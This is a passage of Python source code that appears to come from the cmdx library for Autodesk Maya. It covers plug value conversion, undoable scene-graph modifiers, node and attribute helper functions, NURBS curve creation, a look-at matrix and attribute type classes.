b = 2.0 / (1.0 + s1 * s1 + s2 * s2)
c = 2.0 / (1.0 + t * t)
quat = Quaternion()
quat.w = (b - 1.0) * (c - 1.0)
quat.x = -t * (b - 1.0) * c
quat.y = -b * (c * t * s1 + (c - 1.0) * s2)
quat.z = -b * (c * t * s2 - (c - 1.0) * s1)
assert quat.isNormalised()
return quat
class EulerRotation(om.MEulerRotation):
def asQuaternion(self):
return super(EulerRotation, self).asQuaternion()
if ENABLE_PEP8:
as_quaternion = asQuaternion
# Alias
Euler = EulerRotation
def NurbsCurveData(points, degree=1, form=om1.MFnNurbsCurve.kOpen):
"""Tuple of points to MObject suitable for nurbsCurve-typed data
Arguments:
points (tuple): (x, y, z) tuples per point
degree (int, optional): Defaults to 1 for linear
form (int, optional): Defaults to MFnNurbsCurve.kOpen,
also available kClosed
Example:
Create a new nurbs curve like this.
>>> data = NurbsCurveData(
... points=(
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ))
...
>>> parent = createNode("transform")
>>> shape = createNode("nurbsCurve", parent=parent)
>>> shape["cached"] = data
"""
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
curveFn = om1.MFnNurbsCurve()
data = om1.MFnNurbsCurveData()
mobj = data.create()
for point in points:
cvs.append(om1.MPoint(*point))
curveFn.createWithEditPoints(cvs,
degree,
form,
False,
False,
True,
mobj)
return mobj
class CachedPlug(Plug):
"""Returned in place of an actual plug"""
def __init__(self, value):
self._value = value
def read(self):
return self._value
def _plug_to_default(plug):
"""Find default value from plug, regardless of attribute type"""
if plug.isArray:
raise TypeError("Array plugs are unsupported")
if plug.isCompound:
raise TypeError("Compound plugs are unsupported")
attr = plug.attribute()
type = attr.apiType()
if type == om.MFn.kTypedAttribute:
return om.MFnTypedAttribute(attr).default
elif type in (om.MFn.kDoubleLinearAttribute,
om.MFn.kFloatLinearAttribute,
om.MFn.kDoubleAngleAttribute,
om.MFn.kFloatAngleAttribute):
return om.MFnUnitAttribute(attr).default
elif type == om.MFn.kNumericAttribute:
return om.MFnNumericAttribute(attr).default
elif type == om.MFn.kEnumAttribute:
return om.MFnEnumAttribute(attr).default
else:
raise TypeError("Attribute type '%s' unsupported" % type)
def _plug_to_python(plug, unit=None, context=None):
"""Convert native `plug` to Python type
Arguments:
plug (om.MPlug): Native Maya plug
unit (int, optional): Return value in this unit, e.g. Meters
context (om.MDGContext, optional): Return value in this context
"""
assert not plug.isNull, "'%s' was null" % plug
kwargs = dict()
if context is not None:
kwargs["context"] = context
# Multi attributes
# _____
# | |
# | ||
# | ||
# |_____||
# |_____|
#
if plug.isArray and plug.isCompound:
# E.g. locator["worldPosition"]
return _plug_to_python(
plug.elementByLogicalIndex(0), unit, context
)
elif plug.isArray:
# E.g. transform["worldMatrix"][0]
# E.g. locator["worldPosition"][0]
return tuple(
_plug_to_python(
plug.elementByLogicalIndex(index),
unit,
context
)
for index in range(plug.evaluateNumElements())
)
elif plug.isCompound:
return tuple(
_plug_to_python(plug.child(index), unit, context)
for index in range(plug.numChildren())
)
# Simple attributes
# _____
# | |
# | |
# | |
# |_____|
#
attr = plug.attribute()
type = attr.apiType()
if type == om.MFn.kTypedAttribute:
innerType = om.MFnTypedAttribute(attr).attrType()
if innerType == om.MFnData.kAny:
# E.g. choice["input"][0]
return None
elif innerType == om.MFnData.kMatrix:
# E.g. transform["worldMatrix"][0]
if plug.isArray:
plug = plug.elementByLogicalIndex(0)
return tuple(
om.MFnMatrixData(plug.asMObject(**kwargs)).matrix()
)
elif innerType == om.MFnData.kString:
return plug.asString(**kwargs)
elif innerType == om.MFnData.kNurbsCurve:
return om.MFnNurbsCurveData(plug.asMObject(**kwargs))
elif innerType == om.MFnData.kComponentList:
return None
elif innerType == om.MFnData.kInvalid:
# E.g. time1.timewarpIn_Hidden
# Unsure of why some attributes are invalid
return None
else:
log.debug("Unsupported kTypedAttribute: %s" % innerType)
return None
elif type == om.MFn.kMatrixAttribute:
return tuple(om.MFnMatrixData(plug.asMObject(**kwargs)).matrix())
elif type == om.MFnData.kDoubleArray:
raise TypeError("%s: kDoubleArray is not supported" % plug)
elif type in (om.MFn.kDoubleLinearAttribute,
om.MFn.kFloatLinearAttribute):
if unit is None:
return plug.asMDistance(**kwargs).asUnits(Centimeters)
elif unit == Millimeters:
return plug.asMDistance(**kwargs).asMillimeters()
elif unit == Centimeters:
return plug.asMDistance(**kwargs).asCentimeters()
elif unit == Meters:
return plug.asMDistance(**kwargs).asMeters()
elif unit == Kilometers:
return plug.asMDistance(**kwargs).asKilometers()
elif unit == Inches:
return plug.asMDistance(**kwargs).asInches()
elif unit == Feet:
return plug.asMDistance(**kwargs).asFeet()
elif unit == Miles:
return plug.asMDistance(**kwargs).asMiles()
elif unit == Yards:
return plug.asMDistance(**kwargs).asYards()
else:
raise TypeError("Unsupported unit '%d'" % unit)
elif type in (om.MFn.kDoubleAngleAttribute,
om.MFn.kFloatAngleAttribute):
if unit is None:
return plug.asMAngle(**kwargs).asUnits(Radians)
elif unit == Degrees:
return plug.asMAngle(**kwargs).asDegrees()
elif unit == Radians:
return plug.asMAngle(**kwargs).asRadians()
elif unit == AngularSeconds:
return plug.asMAngle(**kwargs).asAngSeconds()
elif unit == AngularMinutes:
return plug.asMAngle(**kwargs).asAngMinutes()
else:
raise TypeError("Unsupported unit '%d'" % unit)
# Number
elif type == om.MFn.kNumericAttribute:
innerType = om.MFnNumericAttribute(attr).numericType()
if innerType == om.MFnNumericData.kBoolean:
return plug.asBool(**kwargs)
elif innerType in (om.MFnNumericData.kShort,
om.MFnNumericData.kInt,
om.MFnNumericData.kLong,
om.MFnNumericData.kByte):
return plug.asInt(**kwargs)
elif innerType in (om.MFnNumericData.kFloat,
om.MFnNumericData.kDouble,
om.MFnNumericData.kAddr):
return plug.asDouble(**kwargs)
else:
raise TypeError("Unsupported numeric type: %s"
% innerType)
# Enum
elif type == om.MFn.kEnumAttribute:
return plug.asShort(**kwargs)
elif type == om.MFn.kMessageAttribute:
# In order to comply with `if plug:`
return True
elif type == om.MFn.kTimeAttribute:
if unit:
return plug.asMTime(**kwargs).asUnits(unit)
else:
return plug.asMTime(**kwargs).value
elif type == om.MFn.kInvalid:
raise TypeError("%s was invalid" % plug.name())
else:
raise TypeError("Unsupported type '%s'" % type)
def _python_to_plug(value, plug):
"""Pass value of `value` to `plug`
Arguments:
value (any): Instance of Python or Maya type
plug (Plug): Target plug to which value is applied
"""
# Compound values
if isinstance(value, (tuple, list)):
if plug.type() == "kMatrixAttribute":
assert len(value) == 16, "Value didn't appear to be a valid matrix"
return _python_to_plug(Matrix4(value), plug)
for index, value in enumerate(value):
# Tuple values are assumed flat:
# e.g. (0, 0, 0, 0)
# Nested values are not supported:
# e.g. ((0, 0), (0, 0))
# Those can sometimes appear in e.g. matrices
if isinstance(value, (tuple, list)):
raise TypeError(
"Unsupported nested Python type: %s"
% value.__class__
)
_python_to_plug(value, plug[index])
# Native Maya types
elif isinstance(value, om1.MObject):
node = _encode1(plug._node.path())
shapeFn = om1.MFnDagNode(node)
plug = shapeFn.findPlug(plug.name())
plug.setMObject(value)
elif isinstance(value, om.MEulerRotation):
for index, value in enumerate(value):
value = om.MAngle(value, om.MAngle.kRadians)
_python_to_plug(value, plug[index])
elif isinstance(value, om.MAngle):
plug._mplug.setMAngle(value)
elif isinstance(value, om.MDistance):
plug._mplug.setMDistance(value)
elif isinstance(value, om.MTime):
plug._mplug.setMTime(value)
elif isinstance(value, om.MQuaternion):
_python_to_plug(value.asEulerRotation(), plug)
elif isinstance(value, om.MVector):
for index, value in enumerate(value):
_python_to_plug(value, plug[index])
elif isinstance(value, om.MPoint):
for index, value in enumerate(value):
_python_to_plug(value, plug[index])
elif isinstance(value, om.MMatrix):
matrixData = om.MFnMatrixData()
matobj = matrixData.create(value)
plug._mplug.setMObject(matobj)
elif plug._mplug.isCompound:
count = plug._mplug.numChildren()
return _python_to_plug([value] * count, plug)
# Native Python types
elif isinstance(value, string_types):
plug._mplug.setString(value)
elif isinstance(value, int):
plug._mplug.setInt(value)
elif isinstance(value, float):
plug._mplug.setDouble(value)
elif isinstance(value, bool):
plug._mplug.setBool(value)
else:
raise TypeError("Unsupported Python type '%s'" % value.__class__)
def _python_to_mod(value, plug, mod):
"""Convert `value` into a suitable equivalent for om.MDGModifier
Arguments:
value (object): Value of any type to write into modifier
plug (Plug): Plug within which to write value
mod (om.MDGModifier): Modifier to use for writing it
"""
mplug = plug._mplug
if isinstance(value, (tuple, list)):
for index, value in enumerate(value):
# Tuple values are assumed flat:
# e.g. (0, 0, 0, 0)
# Nested values are not supported:
# e.g. ((0, 0), (0, 0))
# Those can sometimes appear in e.g. matrices
if isinstance(value, (tuple, list)):
raise TypeError(
"Unsupported nested Python type: %s"
% value.__class__
)
_python_to_mod(value, plug[index], mod)
elif isinstance(value, om.MVector):
for index, value in enumerate(value):
_python_to_mod(value, plug[index], mod)
elif isinstance(value, string_types):
mod.newPlugValueString(mplug, value)
elif isinstance(value, int):
mod.newPlugValueInt(mplug, value)
elif isinstance(value, float):
mod.newPlugValueFloat(mplug, value)
elif isinstance(value, bool):
mod.newPlugValueBool(mplug, value)
elif isinstance(value, om.MAngle):
mod.newPlugValueMAngle(mplug, value)
elif isinstance(value, om.MDistance):
mod.newPlugValueMDistance(mplug, value)
elif isinstance(value, om.MTime):
mod.newPlugValueMTime(mplug, value)
elif isinstance(value, om.MEulerRotation):
for index, value in enumerate(value):
value = om.MAngle(value, om.MAngle.kRadians)
_python_to_mod(value, plug[index], mod)
else:
log.warning(
"Unsupported plug type for modifier: %s" % type(value)
)
return False
return True
def encode(path):
"""Convert relative or absolute `path` to cmdx Node
Fastest conversion from absolute path to Node
Arguments:
path (str): Absolute or relative path to DAG or DG node
"""
assert isinstance(path, string_types), "%s was not string" % path
selectionList = om.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
mobj = selectionList.getDependNode(0)
return Node(mobj)
def fromHash(code, default=None):
"""Get existing node from MObjectHandle.hashCode()"""
try:
return Singleton._instances["%x" % code]
except KeyError:
return default
def fromHex(hex, default=None, safe=True):
"""Get existing node from Node.hex"""
node = Singleton._instances.get(hex, default)
if safe and node and node.exists:
return node
else:
return node
def toHash(mobj):
"""Cache the given `mobj` and return its hashCode
This enables pre-caching of one or more nodes in situations where
intend to access it later, at a more performance-critical moment.
Ignores nodes that have already been cached.
"""
node = Node(mobj)
return node.hashCode
def toHex(mobj):
"""Cache the given `mobj` and return its hex value
See :func:`toHash` for docstring.
"""
node = Node(mobj)
return node.hex
def asHash(mobj):
"""Return a given hashCode for `mobj`, without caching it
This can be helpful in case you wish to synchronise `cmdx`
with a third-party library or tool and wish to guarantee
that an identical algorithm is used.
"""
handle = om.MObjectHandle(mobj)
return handle.hashCode()
def asHex(mobj):
"""Return a given hex string for `mobj`, without caching it
See docstring for :func:`asHash` for details
"""
return "%x" % asHash(mobj)
if ENABLE_PEP8:
from_hash = fromHash
from_hex = fromHex
to_hash = toHash
to_hex = toHex
as_hash = asHash
as_hex = asHex
# Helpful for euler rotations
degrees = math.degrees
radians = math.radians
sin = math.sin
cos = math.cos
tan = math.tan
pi = math.pi
def meters(cm):
"""Centimeters (Maya's default unit) to Meters
Example:
>>> meters(100)
1.0
"""
return cm * 0.01
def clear():
"""Remove all reused nodes"""
Singleton._instances.clear()
def _encode1(path):
"""Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
"""
selectionList = om1.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
mobject = om1.MObject()
selectionList.getDependNode(0, mobject)
return mobject
def _encodedagpath1(path):
"""Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
"""
selectionList = om1.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
dagpath = om1.MDagPath()
selectionList.getDagPath(0, dagpath)
return dagpath
def decode(node):
"""Convert cmdx Node to shortest unique path
This is the same as `node.shortestPath()`
To get an absolute path, use `node.path()`
"""
try:
return node.shortestPath()
except AttributeError:
return node.name(namespace=True)
def record_history(func):
@wraps(func)
def decorator(self, *args, **kwargs):
_kwargs = kwargs.copy()
_args = list(args)
# Don't store actual objects,
# to facilitate garbage collection.
for index, arg in enumerate(args):
if isinstance(arg, (Node, Plug)):
_args[index] = arg.path()
else:
_args[index] = repr(arg)
for key, value in kwargs.items():
if isinstance(value, (Node, Plug)):
_kwargs[key] = value.path()
else:
_kwargs[key] = repr(value)
self._history.append((func.__name__, _args, _kwargs))
return func(self, *args, **kwargs)
return decorator
class _BaseModifier(object):
"""Interactively edit an existing scenegraph with support for undo/redo
Arguments:
undoable (bool, optional): Put undoIt on the undo queue
interesting (bool, optional): New nodes should appear
in the channelbox
debug (bool, optional): Include additional debug data,
at the expense of performance
atomic (bool, optional): Automatically rollback changes on failure
template (str, optional): Automatically name new nodes using
this template
"""
Type = om.MDGModifier
def __enter__(self):
self.isContext = True
return self
def __exit__(self, exc_type, exc_value, tb):
# Support calling `doIt` during a context,
# without polluting the undo queue.
if self.isContext and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
self.doIt()
def __init__(self,
undoable=True,
interesting=True,
debug=True,
atomic=True,
template=None):
super(_BaseModifier, self).__init__()
self.isDone = False
self.isContext = False
self._modifier = self.Type()
self._history = list()
self._index = 1
self._opts = {
"undoable": undoable,
"interesting": interesting,
"debug": debug,
"atomic": atomic,
"template": template,
}
def doIt(self):
if (not self.isContext) and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
try:
self._modifier.doIt()
except RuntimeError:
# Rollback changes
if self._opts["atomic"]:
self.undoIt()
raise ModifierError(self._history)
self.isDone = True
def undoIt(self):
self._modifier.undoIt()
@record_history
def createNode(self, type, name=None):
try:
mobj = self._modifier.createNode(type)
except TypeError:
raise TypeError("'%s' is not a valid node type" % type)
template = self._opts["template"]
if name or template:
name = (template or "{name}").format(
name=name or "",
type=type,
index=self._index,
)
self._modifier.renameNode(mobj, name)
node = Node(mobj, exists=False, modifier=self)
if not self._opts["interesting"]:
plug = node["isHistoricallyInteresting"]
_python_to_mod(False, plug, self._modifier)
self._index += 1
return node
@record_history
def deleteNode(self, node):
return self._modifier.deleteNode(node._mobject)
delete = deleteNode
@record_history
def renameNode(self, node, name):
return self._modifier.renameNode(node._mobject, name)
rename = renameNode
@record_history
def setAttr(self, plug, value):
if isinstance(value, Plug):
value = value.read()
if isinstance(plug, om.MPlug):
value = Plug(plug.node(), plug).read()
_python_to_mod(value, plug, self._modifier)
def resetAttr(self, plug):
self.setAttr(plug, plug.default)
@record_history
def connect(self, src, dst, force=True):
if isinstance(src, Plug):
src = src._mplug
if isinstance(dst, Plug):
dst = dst._mplug
if force:
# Disconnect any plug connected to `other`
for plug in dst.connectedTo(True, False):
self.disconnect(plug, dst)
self._modifier.connect(src, dst)
@record_history
def disconnect(self, a, b=None, source=True, destination=True):
"""Disconnect `a` from `b`
Arguments:
a (Plug): Starting point of a connection
b (Plug, optional): End point of a connection, defaults to all
source (bool, optional): Disconnect b, if it is a source
source (bool, optional): Disconnect b, if it is a destination
Normally, Maya only performs a disconnect if the
connection is incoming. Bidirectional
disconnect(A, B) => OK
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
disconnect(B, A) => NO
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
"""
if isinstance(a, Plug):
a = a._mplug
if isinstance(b, Plug):
b = b._mplug
if b is None:
# Disconnect any plug connected to `other`
if source:
for plug in a.connectedTo(True, False):
self._modifier.disconnect(plug, a)
if destination:
for plug in a.connectedTo(False, True):
self._modifier.disconnect(a, plug)
else:
if source:
self._modifier.disconnect(a, b)
if destination:
self._modifier.disconnect(b, a)
if ENABLE_PEP8:
do_it = doIt
undo_it = undoIt
create_node = createNode
delete_node = deleteNode
rename_node = renameNode
set_attr = setAttr
reset_attr = resetAttr
class DGModifier(_BaseModifier):
"""Modifier for DG nodes"""
Type = om.MDGModifier
class DagModifier(_BaseModifier):
"""Modifier for DAG nodes
Example:
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... mod.setAttr(node1["translate"], (1, 2, 3))
... mod.connect(node1 + ".translate", node2 + ".translate")
...
>>> getAttr(node1 + ".translateX")
1.0
>>> node2["translate"][0]
1.0
>>> node2["translate"][1]
2.0
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... node1["translate"] = (5, 6, 7)
... node1["translate"] >> node2["translate"]
...
>>> node2["translate"][0]
5.0
>>> node2["translate"][1]
6.0
Example, without context manager:
>>> mod = DagModifier()
>>> parent = mod.createNode("transform")
>>> shape = mod.createNode("transform", parent=parent)
>>> mod.connect(parent["tz"], shape["tz"])
>>> mod.setAttr(parent["sx"], 2.0)
>>> parent["tx"] >> shape["ty"]
>>> parent["tx"] = 5.1
>>> round(shape["ty"], 1) # Not yet created nor connected
0.0
>>> mod.doIt()
>>> round(shape["ty"], 1)
5.1
>>> round(parent["sx"])
2.0
Duplicate names are resolved, even though nodes haven't yet been created:
>>> _ = cmds.file(new=True, force=True)
>>> with DagModifier() as mod:
... node = mod.createNode("transform", name="NotUnique")
... node1 = mod.createNode("transform", name="NotUnique")
... node2 = mod.createNode("transform", name="NotUnique")
...
>>> node.name() == "NotUnique"
True
>>> node1.name() == "NotUnique1"
True
>>> node2.name() == "NotUnique2"
True
Deletion works too
>>> _ = cmds.file(new=True, force=True)
>>> mod = DagModifier()
>>> parent = mod.createNode("transform", name="myParent")
>>> child = mod.createNode("transform", name="myChild", parent=parent)
>>> mod.doIt()
>>> "myParent" in cmds.ls()
True
>>> "myChild" in cmds.ls()
True
>>> parent.child().name()
u'myChild'
>>> mod = DagModifier()
>>> _ = mod.delete(child)
>>> mod.doIt()
>>> parent.child() is None
True
>>> "myChild" in cmds.ls()
False
"""
Type = om.MDagModifier
@record_history
def createNode(self, type, name=None, parent=None):
parent = parent._mobject if parent else om.MObject.kNullObj
try:
mobj = self._modifier.createNode(type, parent)
except TypeError:
raise TypeError("'%s' is not a valid node type" % type)
template = self._opts["template"]
if name or template:
name = (template or "{name}").format(
name=name or "",
type=type,
index=self._index,
)
self._modifier.renameNode(mobj, name)
return DagNode(mobj, exists=False, modifier=self)
@record_history
def parent(self, node, parent=None):
parent = parent._mobject if parent is not None else None
self._modifier.reparentNode(node._mobject, parent)
if ENABLE_PEP8:
create_node = createNode
class DGContext(om.MDGContext):
def __init__(self, time=None):
"""Context for evaluating the Maya DG
Extension of MDGContext to also accept time as a float. In Maya 2018
and above DGContext can also be used as a context manager.
Arguments:
time (float, om.MTime, optional): Time at which to evaluate context
"""
if time is not None:
if isinstance(time, (int, float)):
time = om.MTime(time, om.MTime.uiUnit())
super(DGContext, self).__init__(time)
else:
super(DGContext, self).__init__()
self._previousContext = None
def __enter__(self):
if __maya_version__ >= 2018:
self._previousContext = self.makeCurrent()
return self
else:
cmds.error(
"'%s' does not support context manager functionality for Maya 2017 "
"and below" % self.__class__.__name__
)
def __exit__(self, exc_type, exc_value, tb):
if self._previousContext:
self._previousContext.makeCurrent()
# Alias
Context = DGContext
def ls(*args, **kwargs):
return map(encode, cmds.ls(*args, **kwargs))
def selection(*args, **kwargs):
return map(encode, cmds.ls(*args, selection=True, **kwargs))
def createNode(type, name=None, parent=None):
"""Create a new node
This function forms the basic building block
with which to create new nodes in Maya.
.. note:: Missing arguments `shared` and `skipSelect`
.. tip:: For additional performance, `type` may be given as an MTypeId
Arguments:
type (str): Type name of new node, e.g. "transform"
name (str, optional): Sets the name of the newly-created node
parent (Node, optional): Specifies the parent in the DAG under which
the new node belongs
Example:
>>> node = createNode("transform") # Type as string
>>> node = createNode(tTransform) # Type as ID
"""
try:
with DagModifier() as mod:
node = mod.createNode(type, name=name, parent=parent)
except TypeError:
with DGModifier() as mod:
node = mod.createNode(type, name=name)
return node
def getAttr(attr, type=None, time=None):
"""Read `attr`
Arguments:
attr (Plug): Attribute as a cmdx.Plug
type (str, optional): Unused
time (float, optional): Time at which to evaluate the attribute
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".translateX")
0.0
"""
return attr.read(time=time)
def setAttr(attr, value, type=None):
"""Write `value` to `attr`
Arguments:
attr (Plug): Existing attribute to edit
value (any): Value to write
type (int, optional): Unused
Example:
>>> node = createNode("transform")
>>> setAttr(node + ".translateX", 5.0)
"""
attr.write(value)
def addAttr(node,
longName,
attributeType,
shortName=None,
enumName=None,
defaultValue=None):
"""Add new attribute to `node`
Arguments:
node (Node): Add attribute to this node
longName (str): Name of resulting attribute
attributeType (str): Type of attribute, e.g. `string`
shortName (str, optional): Alternate name of attribute
enumName (str, optional): Options for an enum attribute
defaultValue (any, optional): Default value of attribute
Example:
>>> node = createNode("transform")
>>> addAttr(node, "myString", attributeType="string")
>>> addAttr(node, "myDouble", attributeType=Double)
"""
at = attributeType
if isinstance(at, type) and issubclass(at, _AbstractAttribute):
Attribute = attributeType
else:
# Support legacy maya.cmds interface
Attribute = {
"double": Double,
"double3": Double3,
"string": String,
"long": Long,
"bool": Boolean,
"enume": Enum,
}[attributeType]
kwargs = {
"default": defaultValue
}
if enumName:
kwargs["fields"] = enumName.split(":")
attribute = Attribute(longName, **kwargs)
node.addAttr(attribute)
def listRelatives(node,
type=None,
children=False,
allDescendents=False,
parent=False,
shapes=False):
"""List relatives of `node`
Arguments:
node (DagNode): Node to enquire about
type (int, optional): Only return nodes of this type
children (bool, optional): Return children of `node`
parent (bool, optional): Return parent of `node`
shapes (bool, optional): Return only children that are shapes
allDescendents (bool, optional): Return descendents of `node`
fullPath (bool, optional): Unused; nodes are always exact
path (bool, optional): Unused; nodes are always exact
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> listRelatives(child, parent=True) == [parent]
True
"""
if not isinstance(node, DagNode):
return None
elif allDescendents:
return list(node.descendents(type=type))
elif shapes:
return list(node.shapes(type=type))
elif parent:
return [node.parent(type=type)]
elif children:
return list(node.children(type=type))
def listConnections(attr):
"""List connections of `attr`
Arguments:
attr (Plug or Node):
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("mesh", parent=node1)
>>> node1["v"] >> node2["v"]
>>> listConnections(node1) == [node2]
True
>>> listConnections(node1 + ".v") == [node2]
True
>>> listConnections(node1["v"]) == [node2]
True
>>> listConnections(node2) == [node1]
True
"""
return list(node for node in attr.connections())
def connectAttr(src, dst):
"""Connect `src` to `dst`
Arguments:
src (Plug): Source plug
dst (Plug): Destination plug
Example:
>>> src = createNode("transform")
>>> dst = createNode("transform")
>>> connectAttr(src + ".rotateX", dst + ".scaleY")
"""
src.connect(dst)
def delete(*nodes):
with DGModifier() as mod:
for node in nodes:
mod.delete(node)
def rename(node, name):
with DGModifier() as mod:
mod.rename(node, name)
def parent(children, parent, relative=True, absolute=False):
assert isinstance(parent, DagNode), "parent must be DagNode"
if not isinstance(children, (tuple, list)):
children = [children]
for child in children:
assert isinstance(child, DagNode), "child must be DagNode"
parent.addChild(child)
def objExists(obj):
if isinstance(obj, (Node, Plug)):
obj = obj.path()
try:
om.MSelectionList().add(obj)
except RuntimeError:
return False
else:
return True
# PEP08
sl = selection
create_node = createNode
get_attr = getAttr
set_attr = setAttr
add_attr = addAttr
list_relatives = listRelatives
list_connections = listConnections
connect_attr = connectAttr
obj_exists = objExists
# Speciality functions
kOpen = om1.MFnNurbsCurve.kOpen
kClosed = om1.MFnNurbsCurve.kClosed
kPeriodic = om1.MFnNurbsCurve.kPeriodic
def editCurve(parent, points, degree=1, form=kOpen):
assert isinstance(parent, DagNode), (
"parent must be of type cmdx.DagNode"
)
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
curveFn = om1.MFnNurbsCurve()
for point in points:
cvs.append(om1.MPoint(*point))
mobj = curveFn.createWithEditPoints(cvs,
degree,
form,
False,
False,
True,
_encode1(parent.path()))
mod = om1.MDagModifier()
mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
mod.doIt()
def undo():
mod.deleteNode(mobj)
mod.doIt()
def redo():
mod.undoIt()
commit(undo, redo)
shapeFn = om1.MFnDagNode(mobj)
return encode(shapeFn.fullPathName())
def curve(parent, points, degree=1, form=kOpen):
"""Create a NURBS curve from a series of points
Arguments:
parent (DagNode): Parent to resulting shape node
points (list): One tuples per point, with 3 floats each
degree (int, optional): Degree of curve, 1 is linear
form (int, optional): Whether to close the curve or not
Example:
>>> parent = createNode("transform")
>>> shape = curve(parent, [
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ])
...
"""
assert isinstance(parent, DagNode), (
"parent must be of type cmdx.DagNode"
)
assert parent._modifier is None or parent._modifier.isDone, (
"curve() currently doesn't work with a modifier"
)
# Superimpose end knots
# startpoints = [points[0]] * (degree - 1)
# endpoints = [points[-1]] * (degree - 1)
# points = startpoints + list(points) + endpoints
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
knots = om1.MDoubleArray()
curveFn = om1.MFnNurbsCurve()
knotcount = len(points) - degree + 2 * degree - 1
for point in points:
cvs.append(om1.MPoint(*point))
for index in range(knotcount):
knots.append(index)
mobj = curveFn.create(cvs,
knots,
degree,
form,
False,
True,
_encode1(parent.path()))
mod = om1.MDagModifier()
mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
mod.doIt()
def undo():
mod.deleteNode(mobj)
mod.doIt()
def redo():
mod.undoIt()
commit(undo, redo)
shapeFn = om1.MFnDagNode(mobj)
return encode(shapeFn.fullPathName())
def lookAt(origin, center, up=None):
"""Build a (left-handed) look-at matrix
See glm::glc::matrix_transform::lookAt for reference
+ Z (up)
/
/
(origin) o------ + X (center)
\
+ Y
Arguments:
origin (Vector): Starting position
center (Vector): Point towards this
up (Vector, optional): Up facing this way, defaults to Y-up
Example:
>>> mat = lookAt(
... (0, 0, 0), # Relative the origin..
... (1, 0, 0), # X-axis points towards global X
... (0, 1, 0) # Z-axis points towards global Y
... )
>>> tm = Tm(mat)
>>> int(degrees(tm.rotation().x))
-90
"""
if isinstance(origin, (tuple, list)):
origin = Vector(origin)
if isinstance(center, (tuple, list)):
center = Vector(center)
if up is not None and isinstance(up, (tuple, list)):
up = Vector(up)
up = up or Vector(0, 1, 0)
x = (center - origin).normalize()
y = ((center - origin) ^ (center - up)).normalize()
z = x ^ y
return MatrixType((
x[0], x[1], x[2], 0,
y[0], y[1], y[2], 0,
z[0], z[1], z[2], 0,
0, 0, 0, 0
))
if ENABLE_PEP8:
look_at = lookAt
def first(iterator, default=None):
"""Return first member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> first(it())
1
"""
return next(iterator, default)
def last(iterator, default=None):
"""Return last member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> last(it())
3
"""
last = default
for member in iterator:
last = member
return last
# --------------------------------------------------------
#
# Attribute Types
#
# --------------------------------------------------------
class _AbstractAttribute(dict):
Fn = None
Type = None
Default = None
Readable = True
Writable = True
Cached = True # Cache in datablock?
Storable = True # Write value to file?
Hidden = False # Display in Attribute Editor?
Array = False
Connectable = True
Keyable = True
ChannelBox = False
AffectsAppearance = False
AffectsWorldSpace = False
Help = ""
def __eq__(self, other):
try:
# Support Attribute -> Attribute comparison
return self["name"] == other["name"]
except AttributeError:
# Support Attribute -> string comparison
return self["name"] == other
def __ne__(self, other):
try:
return self["name"] != other["name"]
except AttributeError:
return self["name"] != other
def __hash__(self):
"""Support storing in set()"""
return hash(self["name"])
def __repr__(self):
"""Avoid repr depicting the full contents of this dict"""
return self["name"]
def __new__(cls, *args, **kwargs):
"""Support for using name of assignment
Example:
node["thisName"] = cmdx.Double()
In this example, the attribute isn't given a `name`
Instead, the name is inferred from where it is assigned.
"""
if not args:
return cls, kwargs
return super(_AbstractAttribute, cls).__new__(cls, *args, **kwargs)
def __init__(self,
name,
default=None,
label=None,
writable=None,
readable=None,
cached=None,
storable=None,
keyable=None,
hidden=None,
min=None,
max=None,
channelBox=None,
affectsAppearance=None,
affectsWorldSpace=None,
array=False,
connectable=True,
help=None):
args = locals().copy()
args.pop("self")
self["name"] = args.pop("name")
self["label"] = args.pop("label")
self["default"] = args.pop("default")
# Exclusive to numeric attributes
self["min"] = args.pop("min")
self["max"] = args.pop("max")
# Filled in on creation
self["mobject"] = None
# MyName -> myName
self["shortName"] = self["name"][0].lower() + self["name"][1:]
for key, value in args.items():
default = getattr(self, key[0].upper() + key[1:])
self[key] = value if value is not None else default
def default(self, cls=None):
"""Return one of three available values
Resolution order:
1. Argument
2. Node default (from cls.defaults)
3. Attribute default
"""
if self["default"] is not None:
return self["default"]
if cls is not None:
return cls.defaults.get(self["name"], self.Default)
return self.Default
def type(self):
return self.Type
def create(self, cls=None):
args = [
arg
for arg in (self["name"],
self["shortName"],
self.type())
if arg is not None
]
default = self.default(cls)
if default:
if isinstance(default, (list, tuple)):
args += default
else:
args += [default]
self["mobject"] = self.Fn.create(*args)
# 3 μs
self.Fn.storable = self["storable"]
self.Fn.readable = self["readable"]
self.Fn.writable = self["writable"]
self.Fn.connectable = self["connectable"]
self.Fn.hidden = self["hidden"]
self.Fn.cached = self["cached"]
self.Fn.keyable = self["keyable"]
self.Fn.channelBox = self["channelBox"]
self.Fn.affectsAppearance = self["affectsAppearance"]
self.Fn.affectsWorldSpace = self["affectsWorldSpace"]
self.Fn.array = self["array"]
if self["min"] is not None:
self.Fn.setMin(self["min"])
if self["max"] is not None:
